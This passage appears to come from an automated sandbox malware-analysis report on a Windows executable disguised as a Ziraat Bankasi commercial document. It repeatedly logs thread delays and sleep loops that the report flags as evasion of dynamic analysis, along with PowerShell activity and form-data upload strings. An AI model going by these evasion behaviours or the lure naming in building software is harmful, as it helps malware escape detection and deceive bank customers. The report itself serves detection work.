Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 598344 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 598234 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 598125 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 598011 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 597891 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 597781 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 597672 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 597562 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 597453 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 597344 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 597234 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 597125 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 597015 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 596906 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 596797 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 596687 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 596578 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 596469 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 596359 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 596250 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 596140 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 596031 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 595922 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 595812 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 595703 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 595593 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 595484 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 595375 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 595265 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 595156 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 595047 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 594937 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 594828 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 594719 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 594609 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5453 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4328 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Window / User API: threadDelayed 1295 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Window / User API: threadDelayed 8560 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 4020 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7240 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep count: 35 > 30 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -32281802128991695s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7324 Thread sleep count: 1295 > 30 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7324 Thread sleep count: 8560 > 30 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -599765s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -599547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -599437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -599328s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -599218s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -599109s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -599000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -598890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -598781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -598671s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -598562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -598453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -598344s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -598234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -598125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -598011s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -597891s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -597781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -597672s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -597562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -597453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -597344s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -597234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -597125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -597015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -596906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -596797s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -596687s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -596578s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -596469s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -596359s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -596250s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -596140s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -596031s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -595922s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -595812s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -595703s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -595593s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -595484s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -595375s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -595265s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -595156s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -595047s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -594937s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -594828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -594719s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320 Thread sleep time: -594609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 599218 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 599000 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 598671 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 598344 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 598234 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 598125 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 598011 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 597891 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 597781 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 597672 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 597562 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 597453 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 597344 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 597234 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 597125 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 597015 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 596906 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 596797 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 596687 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 596578 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 596469 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 596359 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 596250 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 596140 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 596031 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 595922 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 595812 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 595703 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 595593 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 595484 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 595375 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 595265 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 595156 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 595047 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 594937 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 594828 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 594719 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Thread delayed: delay time: 594609 Jump to behavior
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003835000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd2ebe433fc515<
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcfb3d74a07ef1
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce649becf6bdd
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd0d5d287e471c<
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd2bc42932ad12<
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd125ccd940545<
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd0c074be0e0b4<
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd1749e1d9f2d8<
